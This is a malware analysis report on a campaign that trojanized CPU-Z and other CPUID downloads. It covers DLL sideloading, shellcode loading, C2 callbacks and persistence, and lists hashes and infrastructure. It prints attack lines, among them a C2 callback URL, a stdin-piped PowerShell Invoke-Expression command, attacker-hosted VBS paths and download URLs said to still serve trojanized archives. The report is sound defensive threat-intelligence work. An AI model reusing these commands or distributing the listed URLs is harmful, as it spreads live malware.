Inside the Trojanized CPU-Z Campaign: DLL Sideloading, Zig Malware, and Multi-Layer Persistence

Original text by N3mes1s

The analysis describes a sophisticated malware campaign delivered through a trojanized CPU-Z software packagedistributed as a ZIP archive. The archive contains legitimate CPU-Z binaries alongside a malicious CRYPTBASE.dll, which is loaded through DLL sideloading due to Windows’ DLL search order behavior. Once executed, the malicious DLL—compiled in Zig—runs code in DllMain, spawns threads, suspends the main application thread, and decodes a large shellcode payload embedded in the .rdata section. The payload uses colon-separated hexadecimal encoding and ultimately loads a reflective PE (out.dll) that communicates with a command-and-control server. The malware resolves its C2 infrastructure through DNS-over-HTTPS and retrieves additional components, which are executed via heavily obfuscated PowerShell loaders. Persistence is established using several techniques, including registry Run keys, scheduled tasks, COM hijacking, and PowerShell autorun profiles. The malware also uses multiple evasion mechanisms such as proxy DLL exports, encrypted payloads, sandbox checks, LOLBins (MSBuild, regsvr32), and runtime C# compilation. Overall, the campaign demonstrates a multi-stage attack chain combining supply-chain delivery, reflective loading, and stealthy persistence mechanisms.

Malware Architecture Diagram:

+------------------------------------------------------+
|                Trojanized CPU-Z ZIP Archive          |
|------------------------------------------------------|
| Legitimate CPU-Z executable                          |
| Malicious CRYPTBASE.dll                              |
+-----------------------------+------------------------+
                              |
                              | DLL sideloading
                              v
+------------------------------------------------------+
|              Malicious CRYPTBASE.dll Loader          |
|------------------------------------------------------|
| Executed via DllMain                                 |
| Creates worker threads                               |
| Suspends / controls main application flow            |
| Decodes embedded payload from .rdata                 |
+-----------------------------+------------------------+
                              |
                              | Embedded shellcode
                              v
+------------------------------------------------------+
|                  Shellcode Decoder Stage             |
|------------------------------------------------------|
| Encoded blob stored in .rdata                        |
| Colon-separated hex payload                          |
| In-memory reconstruction of next stage               |
+-----------------------------+------------------------+
                              |
                              | Reflective loading
                              v
+------------------------------------------------------+
|                 Reflective PE Loader Stage           |
|------------------------------------------------------|
| Loads out.dll in memory                              |
| Avoids normal disk-based execution path              |
| Transfers execution to malware core                  |
+-----------------------------+------------------------+
                              |
                              | Malware core starts
                              v
+------------------------------------------------------+
|                    Core Backdoor Logic               |
|------------------------------------------------------|
| Host profiling / environment checks                  |
| Sandbox / analysis evasion                           |
| Command execution                                    |
| Payload retrieval                                    |
+-----------------------------+------------------------+
                              |
                              | Network comms
                              v
+------------------------------------------------------+
|                 C2 Resolution and Access             |
|------------------------------------------------------|
| DNS-over-HTTPS lookup                                |
| Resolve attacker infrastructure                      |
| Retrieve follow-on components / tasks                |
+-----------------------------+------------------------+
                              |
                              | Launch secondary tools
                              v
+------------------------------------------------------+
|              PowerShell / LOLBin Execution Layer     |
|------------------------------------------------------|
| Obfuscated PowerShell loaders                        |
| MSBuild / regsvr32 / other LOLBins                   |
| Runtime code execution / staging                     |
+-----------------------------+------------------------+
                              |
                              | Persistence setup
                              v
+------------------------------------------------------+
|                  Persistence Mechanisms              |
|------------------------------------------------------|
| Registry Run keys                                    |
| Scheduled Tasks                                      |
| COM hijacking                                        |
| PowerShell profile autoruns                          |
+-----------------------------+------------------------+
                              |
                              | Long-term foothold
                              v
+------------------------------------------------------+
|                Stealth / Evasion Layer               |
|------------------------------------------------------|
| Proxy DLL exports                                    |
| Encrypted / encoded payloads                         |
| In-memory loading                                    |
| Multi-stage execution chain                          |
+------------------------------------------------------+

Simplified Attack Flow:

ZIP Archive
   ↓
CPU-Z.exe
   ↓
CRYPTBASE.dll sideloaded
   ↓
DllMain loader runs
   ↓
Embedded shellcode decoded
   ↓
Reflective PE loaded in memory
   ↓
C2 resolved via DoH
   ↓
PowerShell / LOLBin staging
   ↓
Persistence installed
   ↓
Backdoor remains active

Date: 2026-04-10 Analyst: nemesis Classification: Trojan / Backdoor (Alien RAT variant) Severity: CRITICAL Campaign ID:CityOfSin (extracted from C2 callback UTM parameters) Scope: CPUID official domain compromise affecting CPU-Z, HWMonitor, HWMonitor Pro, PerfMonitor 2, powerMAX + separately FileZilla Status: Breach confirmed and fixed by CPUID; site was compromised ~6 hours on April 9-10, 2026 CPUID Statement: “A secondary feature (a side API) was compromised for approximately six hours […] causing the main website to randomly display malicious links. Our signed original files were not compromised.” Threat Actor Handle: @d_coroner (found in VBS payload headers on live backend) LIVE INFRASTRUCTURE (as of 2026-04-10): Backend 147.45.178.61 still serving VBS payloads; R2 bucket still serving trojanized cpu-z_2.19-en.zip; staging server qwen1.pages.dev still delivering shellcode

1. Executive Summary

On April 9-10, 2026, a large-scale supply chain compromise of the CPUID official website (cpuid.com) was identified, affecting downloads of multiple popular hardware tools. The malware package (cpu-z_2.19-en.zip) bundles legitimate CPU-Z executables alongside a malicious CRYPTBASE.dll that exploits the Windows DLL search order to achieve code execution via DLL sideloading (T1574.002).

Upon execution of the legitimate CPU-Z binary, the malicious DLL is loaded instead of the system CRYPTBASE.dll via transitive DLL search order hijacking (loaded by ADVAPI32.dll, not directly by CPU-Z). This triggers a multi-stage infection chain:

1. Zig-compiled proxy DLL decodes 349KB of colon-hex encoded shellcode from its .rdata section
2. Reflective PE loading of an encrypted out.dll payload via position-independent shellcode
3. DNS-over-HTTPS resolution via Cloudflare (1.1.1.1) to evade DNS monitoring
4. C2 callback to welcome.supp0v3.com — the C2 delivers the actual backdoor (confirmed by sandbox execution ordering: C2 POST occurs before any file drops)
5. PowerShell-based loader executing C2-delivered code via stdin piping
6. In-memory C# compilation using csc.exe, producing shellcode loaders
7. Quad-persistence via MSBuild .proj files, scheduled tasks, COM TypeLib hijacking (with IPv6-encoded .NET deserialization chain), and PowerShell profile autorun

The threat is classified as Backdoor.Win64.Alien by Kaspersky and detected as a trojan by 22/77 AV engines for the ZIP package and 31/76 for the DLL component. The embedded C2 config contains {"tag":"tbs","referrer":"cpz","callback":"..."} and the callback includes the campaign tag CityOfSin, suggesting organized campaign tracking by the threat actor.

---

2. Sample Inventory

2.1 Primary Package (ZIP)

Property	Value
Filename	cpu-z_2.19-en.zip
SHA256	eff5ece65fb30b21a3ebc1ceb738556b774b452d13e119d5a2bfb489459b4a46
SHA1	b3dda9b61f0d7dfadbd23a206cb5d4f06d4eb96b
MD5	fed973c1f9ef2461a45e956fbbdf8ea9
Size	6,050,530 bytes (5.77 MB)
Uncompressed	15,537,164 bytes (14.8 MB)
Type	ZIP archive
First Seen (VT)	2026-04-09
VT Detection	22/77 malicious
Threat Label	trojan.tedy/alien
VT Link	View on VirusTotal

2.2 Bundled Files

The ZIP contains a folder cpu-z_2.19-en (1)/ with the following files:

File	SHA256	Size	Description
CRYPTBASE.dll	49685018878b9a65ced16730a1842281175476ee5c475f608cadf1cdcc2d9524	2,179,584 B	MALICIOUS– DLL sideload payload
cpuz_x32.exe	d4b7556f00a6d5ea5a47a5aefe267681334167db8c83ba94806da3dfd9fdca79	5,903,080 B	Legitimate CPU-Z 32-bit (launcher)
cpuz_x64.exe	8e0077a742183fbcbb4f6cf2fe945ea2ced13a058ccf79f5b81157ededc47e16	7,411,432 B	Legitimate CPU-Z 64-bit (target host)
cpuz.ini	b7b3560e286ba5f39c019e99face5cfa68cca42cf29bbe2e0f0d1e9626de5c8f	610 B	Configuration file
cpuz_readme.txt	7eb3223b9759e6553fdb23f93b384f451af342982a21343735d4349827e5d1a5	42,458 B	Readme (legitimacy decoy)

2.3 Related DLL Variant

A second variant of the malicious CRYPTBASE.dll was also identified:

Property	Value
SHA256	9cdabd70f50dc8c03f0dfb31894d9d5265134a2cf07656ce8ad540c1790fc984
SHA1	7cee7db67985413f22d9424a371336647a987a97
MD5	9012602d41cde23297a73c074a413ff6
Size	1,256,960 bytes (1.19 MB)
Imphash	7f3aa71d29bb7534f516d6ca6723ccf4
VT Detection	31/76 malicious
VT Link	View on VirusTotal

Key difference: The variant is smaller (1.19 MB vs 2.13 MB) and has a different imphash, suggesting a different compilation or build of the same payload family.

2.4 C2-Delivered Dropped Files

These files are not present in the ZIP — they are delivered by the C2 server after the initial callback and dropped to disk by the PowerShell stage. This was confirmed by sandbox execution ordering (C2 POST occurs before file writes).

File	SHA256	Size	Type	Purpose
CommonBuild.proj	1f7fa30eefeedfdcaaf0eca7d20d866fd48e5d3e75dbe7e47976bac3c097b271	3,984 B	MSBuild XML + C#	Persistence shellcode loader (XOR decrypt + NtAllocateVirtualMemory)
c_3791.proj	Same hash (identical file)	3,984 B	MSBuild XML + C#	Same payload, alternate path
ActiveX.sct	0d8d759db6c2012210a07ca825b01f727a3a23d615b8dbb4c241b508b2011448	977 B	COM Scriptlet (JScript)	COM TypeLib hijack -> launches Clippy.sct via regsvr32
Clippy.sct	02ff4cf4bea26993e4556706bada73fce98284388c57bad31ceb784c4791a703	11,879 B	COM Scriptlet (JScript)	IPv6-encoded .NET assembly (Moniker.dll) deserialization runner
Moniker.dll	3d805bd27ceb641615b755d26092b13c135e1f3eb9f9758cd9df4bd08ace3d2d	4,185 B	.NET Assembly (i386 IL)	Shellcode runner: reads file, VirtualAlloc RWX, CreateThread
BuildCache.dat	(varies per victim)	—	XOR-encrypted shellcode	Shellcode payload read by CommonBuild.proj (XOR key: 1+(i%17))
data.dat	(varies per victim)	—	Raw shellcode	Shellcode payload read by Moniker.dll via CachePath env var

---

3. Attack Overview

3.1 Attack Vector & Supply Chain Method

This is NOT a compromise of CPUID’s build infrastructure. The bundled executables are genuinely signed by CPUID and Microsoft:

Binary	Signer	Certificate	Signed Date	VT Detection
cpuz_x32.exe	CPUID + Microsoft Windows HCP	Sectigo EV Code Signing	2026-03-16 10:44 AM	0/77 (clean)
cpuz_x64.exe	CPUID + Microsoft Windows HCP	Sectigo EV Code Signing	2026-03-16 10:45 AM	0/77 (clean)

The attack is a software repackaging attack: the threat actor downloads official CPUID releases, adds a malicious CRYPTBASE.dll, and repackages as ZIP for distribution. Distribution vectors likely include:

• Malvertising via Google Ads (consistent with the 2023 CPU-Z malvertising campaign)
• SEO poisoning with fake download sites
• Fake software portals (file names like cpu-z_2.19-en.zip, cpu-z.zip, cpu-z_2.19.zip suggest multiple distribution channels)

Evidence of repackaging: One VT submission path was cpu-z_2.19-en + CRYPT/cpuz_x32.exe — the attacker’s working directory name + CRYPT leaked, showing the DLL was manually added.

3.1.1 Multi-Product Campaign (Confirmed)

This is not limited to CPU-Z. The same threat actor is trojanizing multiple CPUID products using identical infrastructure:

Package	SHA256 (prefix)	Size	CRYPTBASE.dll Hash	C2 Domain	Confirmed
cpu-z_2.19-en.zip	eff5ece6...	6.0 MB	49685018...	welcome.supp0v3.com	VT sandbox
cpu-z_2.19-en.zip (variant)	9932fa8d...	6.0 MB	(bundled)	welcome.supp0v3.com	VT sandbox
cpu-z.zip / cpu-z_2.19.zip	cfbd87ba...	5.9 MB	(bundled)	welcome.supp0v3.com	VT contacted_domains
cpu-z_2.19-en.zip (variant)	f8b09fa8...	5.9 MB	(bundled)	welcome.supp0v3.com	VT sandbox
powermax_1.00/(with PDF lure)	d3bb52e5...	11.9 MB	b63aa4a7...(same size, diff hash)	welcome.supp0v3.com	VT contacted_domains

The powerMAX package includes a legitimate PDF documentation lure (powerMAX.pdf, 378KB, 0/77 detection) alongside the trojanized binaries, adding credibility.

3.1.2 Threat Actor Infrastructure Timeline

The supp0v3.com domain and associated infrastructure reveal a development timeline:

Date	Event	Evidence
2025-09-19	.url exploit targeting LibreOffice (file://147.45.178.61@80/.../LibreOffice_25.8.4_Win_x86-64.vbs)	VT first_submission_date; CVE-2023-36025 SmartScreen bypass
2025-10-29	Domain supp0v3.com registered	WHOIS creation_date
2025-10-29	ai.supp0v3.com goes live -> 147.45.178.61 (bare IP, NOT behind Cloudflare)	VT DNS; development/staging server
2025-11-17	helloworld.supp0v3.com created (behind Cloudflare)	VT first seen; testing Cloudflare fronting
2025-11-27	Apache server on 147.45.178.61 last modified	Shodan Last-Modified header
2025-12-07	.url exploit targeting Google Drive (file://147.45.178.61@80/.../GoogleDriveSetup.vbs)	VT first_submission_date
2025-12-11	welcome.supp0v3.com activated (production C2, behind Cloudflare)	VT first seen
2025-12-13	First CRYPTBASE.dll variant appears (trojan.reflo, 2.2MB)	VT first_submission_date for 8a6c39f9...
2026-03-16	CPU-Z v2.19 officially signed by CPUID	Authenticode signing date
2026-04-08	powerMAX trojanized ZIP created (with PDF lure)	ZIP bundle highest_datetime
2026-04-09	CPU-Z trojanized ZIPs appear in the wild	VT first_submission_date for eff5ece6...

3.1.3 Backend Server (147.45.178.61)

The ai.supp0v3.com subdomain exposes the real backend server — NOT behind Cloudflare:

Property	Value
IP	147.45.178.61
PTR	135119.ip-ptr.tech
ASN	AS215540 (Global Connectivity Solutions LLP)
Location	Frankfurt am Main, Germany
Org Address	Suite 310, 21 Hill Street, Haverfordwest, Pembrokeshire, UK
Open Ports	22 (OpenSSH 9.6p1 Ubuntu), 80 (Apache httpd)
TLS Certificate	Subject: *.vk.com, O=V Kontakte LLC, L=Saint Petersburg, C=RU
VT Detection	8/94 malicious

The server uses a stolen or self-signed VK.com (VKontakte) wildcard certificate with Russian locality data (Saint Petersburg). This, combined with the bulletproof hosting choice (Global Connectivity Solutions — a provider frequently used for malicious hosting), strongly suggests a Russian-nexus threat actor.

The same IP was used for earlier .url shortcut exploits (CVE-2023-36025 SmartScreen bypass) targeting LibreOffice and Google Drive downloads, sharing VBS payloads via WebDAV (file://147.45.178.61@80/file/...). This connects the current DLL sideloading campaign to an earlier Windows shortcut exploit campaign by the same actor.

3.1.4 Three CRYPTBASE.dll Variants

Variant	SHA256 (prefix)	Size	Imphash	First Seen	Notes
v1 (early)	8a6c39f9...	2,217,472	4ace1d82...	2025-12-13	Labeled trojan.reflo; also seen as fi8i1i.exe
v2 (smaller)	9cdabd70...	1,256,960	7f3aa71d...	2025-12-31	No TLS/buildid; has MessageBoxAimport
v3 (bundled)	49685018...	2,179,584	76ef47c1...	2026-04-09	TLS support, SRW locks; production build
v3b(powerMAX)	b63aa4a7...	2,179,584	(same family)	2026-04-08	Same size as v3, different hash; powerMAX campaign

3.1.5 Wider Campaign: FileZilla, PerfMonitor, and CPUID Domain Compromise

VT intelligence and OSINT reveal this is part of a larger supply chain operation affecting multiple software products:

FileZilla (confirmed same C2):

Property	Value
DLL	version.dll (DLL sideloading, not CRYPTBASE.dll)
SHA256	e4c6f8ee8c946c6bd7873274e6ed9e41dec97e05890fa99c73f4309b60fd3da4
Size	361,984 bytes
Detection	50/76
First seen	2025-12-31
Threat label	trojan.tedy/r002c0dcl26
Contacted IPs	104.21.63.112, 172.67.145.101 (same as welcome.supp0v3.com), 1.1.1.1 (DoH)
Tags	spreader, checks-bios, detect-debug-environment, calls-wmi

The FileZilla variant uses version.dll instead of CRYPTBASE.dll for sideloading but contacts the same C2 IPs(104.21.63.112, 172.67.145.101) and uses the same DoH technique (1.1.1.1). The trojan.tedy classification matches the CPU-Z samples.

PerfMonitor 2 (confirmed same pattern):

Property	Value
Package	perfmonitor-2_2.04.zip
SHA256	e0541fb863142ed515f2e76a2f93babc3b9cf3af1b6d12be57f16a665b4f6406
Size	1,396,662 bytes
Detection	14/77
Bundle	6 children: 2 EXE + 1 DLL + 1 PDF + 1 INI (same pattern as CPU-Z and powerMAX)

CPUID Official Domain Compromise (OSINT):

Per vx-underground and igor’sLAB, the official cpuid.com domain was compromised and serving trojanized downloads directly. The malware was described as:

• Deeply trojanized, distributing from the compromised official domain
• Multi-staged, operating almost entirely in-memory
• Using “interesting methods to evade EDRs and AVs such as proxying NTDLL functionality from a .NET assembly”
• The same threat group that was masquerading FileZilla in early March 2026

This confirms the attack is a true supply chain compromise — not just software repackaging — with the official CPUID download infrastructure serving malicious binaries.

The compromise was discovered when Reddit users noticed HWMonitor 1.63 downloads from cpuid.com were redirected to a file named HWiNFO_Monitor_Setup.exe with a Russian-language installer (modified Inno Setup). Download links on cpuid.com were redirected to Cloudflare R2 object storage rather than CPUID’s standard infrastructure.

Official CPUID Statement (from Doc TB / Sam, CPUID developer, via X/Twitter):

“Investigations are still ongoing, but it appears that a secondary feature (basically a side API) was compromised for approximately six hours between April 9 and April 10, causing the main website to randomly display malicious links (our signed original files were not compromised). The breach was found and has since been fixed.”

Key takeaways from CPUID’s statement:

• Attack vector: A “side API” on the CPUID website was compromised — not the build pipeline or file hosting
• Duration: ~6 hours between April 9-10, 2026
• Mechanism: The compromised API caused download links to randomly redirect to malicious URLs (Cloudflare R2 buckets)
• Signed files safe: CPUID’s original signed binaries were NOT compromised — the attacker served their own trojanized packages via redirect
• Status: Breach found and fixed

Cloudflare R2 Redirect URLs (discovered via VT intelligence):

https://pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev/hwmonitor_1.63.zip
https://pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev/hwmonitor_1.63.zip
https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/hwmonitor/HWiNFO_Monitor_Setup.exe

Three separate Cloudflare R2 bucket IDs were used, suggesting the attacker rotated storage to avoid takedowns:

• pub-f3252d8370f34f0d9f3b3c427d3ac33c
• pub-fd67c956bf8548b7b2cc23bb3774ff0c
• pub-45c2577dbd174292a02137c18e7b1b5a

HWiNFO_Monitor_Setup.exe (the redirected installer):

Property	Value
SHA256	eefc0f986dd3ea376a4a54f80ce0dc3e6491165aefdd7d5d6005da3892ce248f
Size	4,233,610 bytes
Detection	33/77 (Kaspersky: Backdoor.Win64.Alien.de, CrowdStrike: win/malicious_confidence_100%)
Type	Modified Inno Setup installer with Russian-language dialogs
First seen	2026-04-09
Threat	trojan.tedy/filerepmalware

Two distribution methods were used:

1. ZIP repackaging — official ZIPs re-bundled with malicious CRYPTBASE.dll added
2. Inno Setup installer — completely custom installer (HWiNFO_Monitor_Setup.exe) served via R2 redirect, with embedded payload and Russian UI

Full confirmed scope of compromised CPUID products (all using identical 2,179,584-byte CRYPTBASE.dll variants, confirmed via VT intelligence):

Product	CRYPTBASE.dll SHA256 (prefix)	VT Path	Detection
CPU-Z 2.19	49685018...	cpu-z_2.19-en (1)/CRYPTBASE.dll	31/77
CPU-Z 2.19 (variant build)	0d5578b2...	cpu-z_2.19-en + CRYPT/CRYPTBASE.dll	24/77
HWMonitor 1.63	aec12d65...	hwmonitor_1.63/CRYPTBASE.dll	29/77
HWMonitor 1.63 (variant build)	a6afdcc6...	hwmonitor_1.63/CRYPTBASE.dll	23/77
HWMonitor Pro 1.57	98e0f9c8...	hwmonitor-pro_1.57/CRYPTBASE.dll	20/77
PerfMonitor 2 v2.04	cd7385e7...	perfmonitor-2_2.04/CRYPTBASE.dll	25/77
powerMAX 1.00	b63aa4a7...	powermax_1.00/CRYPTBASE.dll	(bundled in ZIP)

FileZilla (same C2, different DLL name):

Product	DLL	SHA256 (prefix)	Detection	Evidence
FileZilla 3.69.5	version.dll	e4c6f8ee...	50/76	Contacts same IPs: 104.21.63.112, 172.67.145.101, 1.1.1.1

MEXC Crypto Exchange (same C2 string embedded):

Product	DLL	SHA256	Size	Detection	First Seen
MEXC exchange app	CRYPTBASE.dll	74b5d631cc6802a5790f99a4bfefd9b3dfcfb43007f9fc576f7dfd4eac69d52e	34,304 B	20/76	2025-11-27

The MEXC variant is remarkably small (34KB vs 2.2MB for CPUID), suggesting a minimal loader build. This extends the campaign beyond software utilities into cryptocurrency/fintech.

Additional version.dll variant (unknown host application):

DLL	SHA256	Size	Detection	First Seen	Threat
version.dll	c3f74b948b902cc641da83fe6535133894ed979a73068e4937c633c9a661e3ce	1,242,624 B	41/76	2025-12-31	trojan.dllhijack/r002c0dco26

VBA macro component (possible phishing delivery):

File	SHA256	Size	Detection	First Seen	Threat
VBA document	1c76af3a9097f50384345237140df78e8b456e4165b0270fdc3a1414413dc64e	14,776 B	8/76	2025-12-17	trojan.networm/sagent

This VBA file contains the supp0v3.com C2 string, suggesting the threat actor also uses email/document phishing as an initial access vector alongside the supply chain compromise.

Complete R2 distribution directory (reconstructed from VT URL intelligence):

pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/       ← MAIN BUCKET (all products)
├── cpu-z_2.19-en.zip
├── hwmonitor_1.63.zip
├── hwmonitor/
│   └── HWiNFO_Monitor_Setup.exe                   ← Inno Setup with Russian UI
├── hwmonitor-pro/
│   ├── hwmonitor-pro_1.57.zip
│   └── HWMonitorPro_1.57_Setup.exe
├── perfmonitor/
│   ├── perfmonitor-2_2.04.zip
│   └── PerfMonitor2_Setup.exe
└── powermax/
    ├── powermax_1.00.zip
    └── powermax.exe

pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev/       ← SECONDARY BUCKET
├── cpu-z_2.19-en.zip
└── hwmonitor_1.63.zip

pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev/       ← TERTIARY BUCKET
├── cpu-z.zip
└── hwmonitor_1.63.zip

Complete DLL variant inventory (all containing supp0v3.com C2 string):

Variant	DLL Name	Size	Proxy Exports	Target	First Seen
MEXC minimal	CRYPTBASE.dll	34 KB	SystemFunction001-004	Crypto exchange	2025-11-27
FileZilla	version.dll	362 KB	GetFileVersionInfoA etc.	File transfer	2025-12-31
Unknown app	version.dll	1.2 MB	GetFileVersionInfoA etc.	Unknown	2025-12-31
CPUID early	CRYPTBASE.dll	2.2 MB	SystemFunction001-041	CPUID products	2025-12-13
CPUID production	CRYPTBASE.dll	2.1 MB	SystemFunction001-041	CPUID products	2026-04-09

The threat actor maintains multiple builds of their DLL proxy at different sizes, adapting the payload to the target application. All variants share the core architecture: proxy DLL exports + embedded C2 config + colon-hex encoded shellcode in .rdata.

3.2 Kill Chain

[User downloads trojanized CPU-Z ZIP]
         |
         v
[Extracts ZIP -> cpu-z_2.19-en (1)/]
         |
         v
[Runs cpuz_x32.exe -> launches cpuz_x64.exe]
         |
         v
[cpuz_x64.exe loads CRYPTBASE.dll from local directory]
[DLL SIDELOADING - T1574.002 (transitive via ADVAPI32.dll)]
         |
         v
[CRYPTBASE.dll: suspends main thread, decodes 349KB shellcode from .rdata]
[Reflective-loads encrypted out.dll via shellcode stub]
         |
         v
[out.dll resolves C2 via DNS-over-HTTPS (1.1.1.1)]
[GET https://1.1.1.1/dns-query?name=welcome.supp0v3.com&type=A]
         |
         v
[C2 callback - RECEIVES next-stage payload]
[POST https://welcome.supp0v3.com/d/callback -> 200 OK (55 bytes JSON)]
[?utm_tag=snip&utm_source=CityOfSin]
         |
         v
[PowerShell spawned via stdin pipe with C2-delivered code]
[powershell.exe -Command "[Console]::In.ReadToEnd() | Invoke-Expression"]
         |
         v
[PowerShell compiles C# via csc.exe, drops persistence files]
[.cs source -> .dll -> BuildCache.dat -> c_3791.proj -> CommonBuild.proj]
         |
         v
[Establishes persistence x4]:
  1. Registry Run key (MSBuild .proj loader)
  2. Scheduled Task (hidden PowerShell every 68 min)
  3. COM Hijacking (TypeLib -> ActiveX.sct -> Clippy.sct -> Moniker.dll)
  4. PowerShell profile autorun (autorun.ps1)
         |
         v
[Launches Chrome from PowerShell (purpose under investigation)]

3.3 Verified Execution Sequence (Sandbox-Proven)

The following execution order was verified from CAPE sandbox process creation and HTTP event ordering. The critical finding is that the C2 callback occurs before any file drops or persistence — confirming the backdoor components are C2-delivered, not statically embedded.

#	Event	Evidence
1	cpuz_x32.exe starts	Process created [0]
2	cpuz_x32.exe launches cpuz_x64.exe	Process created [1]
3	cpuz_x64.exe transitively loads CRYPTBASE.dll (via ADVAPI32 DLL search order)	DLL sideloading observed
4	CRYPTBASE.dll decodes .rdata payload, reflective-loads out.dll	Shellcode execution in DLL thread
5	out.dll resolves C2 via DoH	HTTP [2]: GET https://1.1.1.1/dns-query?name=welcome.supp0v3.com&type=A -> 200
6	out.dll contacts C2 server	HTTP [3]: POST https://welcome.supp0v3.com/d/callback -> 200 (55 bytes JSON)
7	C2 delivers backdoor payload	C2 response received before any file writes
8	PowerShell spawned with C2-delivered code via stdin	Process created [4]: powershell.exe -Command "[Console]::In.ReadToEnd() | Invoke-Expression"
9	C# source code compiled	Process [5]: csc.exe /noconfig /fullpaths @"...\ktc155gm.cmdline" -> writes .cs, .dll
10	Persistence files dropped	Files [29-31]: BuildCache.dat, c_3791.proj, CommonBuild.proj
11	Registry persistence set	Registry [1]: Run key; Registry [2-3]: COM TypeLib hijack
12	Chrome launched with extension	Process [7]: chrome.exe

Key insight: Steps 5-6 (C2 callback) occur before steps 8-11 (code compilation + persistence). The DLL itself only contains the dropper/loader — the actual backdoor code (C# source, .proj files, .sct scriptlets) is fetched from the C2 at runtime.

3.4 MITRE ATT&CK Mapping

Tactic	Technique	ID	Detail
Initial Access	Supply Chain Compromise	T1195.002	Trojanized CPU-Z ZIP distribution
Execution	Command and Scripting Interpreter: PowerShell	T1059.001	stdin-piped PowerShell execution
Execution	Command and Scripting Interpreter: JavaScript	T1059.007	ActiveX.sct and Clippy.sct JScript execution
Execution	Inter-Process Communication	T1559	PowerShell stdin piping to avoid cmdline logging
Execution	Signed Binary Proxy Execution: MSBuild	T1127.001	MSBuild .proj file with inline C# tasks
Execution	Signed Binary Proxy Execution: Regsvr32	T1218.010	ActiveX.sct -> regsvr32 /i:Clippy.sct scrobj.dll
Execution	Reflective Code Loading	T1620	out.dll reflective PE loading via shellcode stub
Execution	.NET Deserialization	T1059	BinaryFormatter deserialization of Moniker.dll via IPv6 encoding
Persistence	Boot or Logon Autostart Execution: Registry Run Keys	T1547.001	HKCU…\Run<random-guid> -> MSBuild .proj
Persistence	Scheduled Task/Job	T1053.005	Hidden scheduled task every 68 min for 20 years
Persistence	Event Triggered Execution: Component Object Model Hijacking	T1546.015	TypeLib GUID {EAB22AC0-…} -> ActiveX.sct -> Clippy.sct -> Moniker.dll
Persistence	Boot or Logon Autostart Execution: PowerShell Profile	T1546.013	autorun.ps1 in PowerShell directory
Defense Evasion	Hijack Execution Flow: DLL Side-Loading	T1574.002	Transitive sideload via ADVAPI32 -> CRYPTBASE.dll
Defense Evasion	Obfuscated Files or Information	T1027	Colon-hex encoding in .rdata; XOR 1+(i%17) for BuildCache.dat; IPv6-encoded .NET assembly
Defense Evasion	Deobfuscate/Decode Files or Information	T1140	Runtime decoding of shellcode from .rdata; XOR decryption of BuildCache.dat
Defense Evasion	Indicator Removal: File Deletion	T1070.004	Self-delete behavior
Defense Evasion	Virtualization/Sandbox Evasion	T1497	Debug environment detection, BIOS checks, long sleeps (Zenbox marked CLEAN)
Defense Evasion	Process Injection	T1055	NtAllocateVirtualMemory + shellcode execution via delegate invoke
Defense Evasion	Masquerading	T1036	.proj disguised as “Microsoft.Build.PackageOptimizer”; business-themed PS variable names
Defense Evasion	Ingress Tool Transfer	T1105	Backdoor components delivered from C2, not present in initial dropper
Defense Evasion	Abuse Elevation Control: Bypass UAC	T1548.002	consent.exe invoked (Dr.Web sandbox)
Discovery	System Information Discovery	T1082	Computer name, username, memory, BIOS checks
Execution	User Execution	T1204	Launches Chrome from PowerShell (purpose under investigation)
Command and Control	Application Layer Protocol: DNS	T1071.004	DNS-over-HTTPS via Cloudflare (1.1.1.1)
Command and Control	Encrypted Channel: Asymmetric Cryptography	T1573.002	HTTPS C2 communication
Command and Control	Proxy: External Proxy	T1090.002	Cloudflare CDN as reverse proxy; Caddy backend
Command and Control	Web Service: Bidirectional Communication	T1102.002	Cloudflare R2 object storage for payload distribution

---

4. Technical Analysis

4.1 Stage 0 – Delivery (Trojanized ZIP)

The package cpu-z_2.19-en.zip is a ZIP archive created on 2026-04-09 12:42:10 UTC. It contains a folder cpu-z_2.19-en (1)/ with 5 files: two legitimate CPU-Z executables (x32 and x64), a configuration file, a readme, and the malicious CRYPTBASE.dll.

The legitimate CPU-Z binaries serve as the “host” application that will unknowingly load the malicious DLL. The readme and ini files add to the appearance of a legitimate software package.

4.2 Stage 1 – DLL Sideloading (CRYPTBASE.dll)

Technique: T1574.002 – DLL Side-Loading

CRYPTBASE.dll is a Windows system DLL normally located in C:\Windows\System32\. The legitimate cpuz_x64.exeimports functions from this DLL. When placed in the same directory as the executable, Windows loads it from the local directory first (DLL search order hijacking).

Malicious CRYPTBASE.dll (bundled) analysis:

Property	Value
Architecture	PE32+ (x86-64) DLL
Imphash	76ef47c106370a232be021dc2e46cdf7
Entry Point	0x1000
Sections	.text, .rdata, .buildid, .data, .pdata, .tls, .reloc
.rdata size	2,041,856 bytes (contains embedded payload data)
Threat Label	trojan.tedy/alien

Exported functions (proxy exports): The DLL exports the same functions as the legitimate CRYPTBASE.dll to maintain compatibility:

• DllMain
• SystemFunction001 through SystemFunction005
• SystemFunction028, SystemFunction029
• SystemFunction034, SystemFunction036
• SystemFunction040, SystemFunction041

These proxy exports likely forward calls to the real CRYPTBASE.dll while executing malicious code in DllMain or a CreateThread call.

Key imports (malicious DLL variant):

KERNEL32.dll: CreateThread, VirtualAlloc, GetProcAddress, LoadLibraryExA,
              ReadFile, WriteFile, SuspendThread, OpenThread, FreeLibrary
USER32.dll:   MessageBoxA
ntdll.dll:    NtAllocateVirtualMemory, NtFreeVirtualMemory

The use of NtAllocateVirtualMemory (direct syscall-adjacent) and CreateThread strongly suggests shellcode injection or in-memory payload execution.

4.3 Deep Dive: CRYPTBASE.dll Internals

4.3.1 PE Structure

The malicious CRYPTBASE.dll is a Zig-compiled x86-64 DLL, confirmed by:

• .buildid section with Zig-style build ID (abd683ca)
• thread panic: error string (Zig stdlib panic handler format)
• aborting due to recursive panic (Zig runtime)
• Unable to dump stack trace: debug info stripped (Zig stripped binary)

Bundled CRYPTBASE.dll PE Layout:

Section      VirtAddr   VirtSize    RawSize  Entropy  Flags
.text         0x1000      11,494     11,776    6.52    XR    (code - 11KB)
.rdata        0x4000   2,041,804  2,041,856    4.24    R     (PAYLOAD - 1.95MB)
.buildid    0x1f7000         28        512    0.10    R     (Zig build ID)
.data       0x1f8000      4,500        512    0.65    RW    (globals)
.pdata      0x1fa000        588      1,024    2.86    R     (exception info)
